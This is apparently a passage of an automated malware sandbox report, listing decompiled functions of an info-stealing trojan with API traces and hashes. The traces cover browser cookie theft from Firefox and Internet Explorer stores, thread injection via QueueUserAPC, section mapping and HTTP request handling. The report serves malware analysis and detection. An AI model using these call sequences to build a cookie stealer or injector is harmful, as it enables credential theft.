    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
